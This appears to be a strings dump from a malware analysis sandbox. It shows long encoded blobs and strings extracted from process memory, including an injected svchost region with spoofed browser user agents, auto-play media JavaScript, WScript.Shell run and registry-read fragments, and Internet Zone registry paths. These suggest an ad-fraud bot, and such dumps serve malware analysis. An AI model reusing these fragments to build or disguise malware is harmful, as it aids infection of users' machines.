bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD2
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

mscorsvw.exe_3848:

.text
`.data
.rsrc
@.reloc
EX_CATCH line %d
CACHE_S_FORMATETC_NOTSUPPORTED
CTL_E_GETNOTSUPPORTEDATRUNTIME
CTL_E_GETNOTSUPPORTED
CTL_E_SETNOTSUPPORTEDATRUNTIME
CTL_E_SETNOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
REGDB_E_KEYMISSING
OLE_E_ADVISENOTSUPPORTED
CO_E_INIT_SCM_EXEC_FAILURE
EX_THROW Type = 0x%x HR = 0x%x, line %d
ThrowHR: HR = %x
mscorsvw.pdb
_amsg_exit
_acmdln
MSVCR100_CLR0400.dll
_crt_debugger_hook
RegCloseKey
RegQueryInfoKeyW
RegOpenKeyExW
ADVAPI32.dll
GetWindowsDirectoryW
GetCPInfo
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjectsEx
USER32.dll
mscoree.dll
ole32.dll
OLEAUT32.dll
.PAVException@@
v1.0.3705
.PAVOutOfMemoryException@@
.PAVHRException@@
7 7$7(7,7074787
6$6,686\6|6
advapi32.dll
Wtsapi32.dll
kernel32.dll
mscorsvc.dll
Microsoft .NET Runtime Optimization Service
Microsoft .NET Runtime Optimization Service has been uninstalled
Failed to uninstall Microsoft .NET Runtime Optimization Service
Microsoft .NET Runtime Optimization Service has been installed
Failed to install Microsoft .NET Runtime Optimization Service
Failed to retrieve Microsoft .NET Runtime Optimization Service interface
Set service status to %d
Service control handler op %u, event type %u
\ndpsetup.bat
Created repair process in session %d, process ID %d
Unable to create repair process, error %d
Microsoft.NET\NETFXRepair.exe
Error changing token session ID, error %d
Error duplicating current process token, error %d
Error getting current process token, error %d
Session %u has become active.
Aborting repair due to unexpected wait status %u
Found active session %u
Aborting repair due to error %u from WTSEnumerateSessions
StartServiceCtrlDispatcher failed with error %d. Will try slow path
\fusion.localgac
\v2.0.50727
SOFTWARE\Microsoft\.NetFramework
v4.0.0
SOFTWARE\Microsoft\.NETFramework\NGenQueueMSI\WIN32\Default
SOFTWARE\Microsoft\.NETFramework\NGenQueue\WIN32\Default
ngenrootstorelock.dat
ngenservicelock.dat
FastStartupCheck(isPrivateRuntime=%d)
yKERNEL32.DLL
Software\Microsoft\.NETFramework
RestrictedGCStressExe
EnableInternetHREFexes
NGENServiceWaitPassiveWork
NGENServicePassiveWorkWaitTimeout
NGENServicePassiveHardDiskIdleTimeout
NGENServicePassiveExceptInputTimeout
MD_ForceNoColDesSharing
UNSUPPORTED_DbgDontResumeThreadsOnUnhandledException
DbgTransportProxyAddress
DbgRedirectCreateCmd
DbgRedirectCommonCmd
DbgRedirectAttachCmd
mscorrc.dll
v4.0.30319
.NET Runtime Optimization Service
4.0.30319.1 (RTMRel.030319-0100)
mscorsvw.exe
.NET Framework
4.0.30319.1

svchost.exe_316_rwx_00080000_000B2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
<%<*<;<@<
:!:%:):-:1:
?:???_?}?
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z 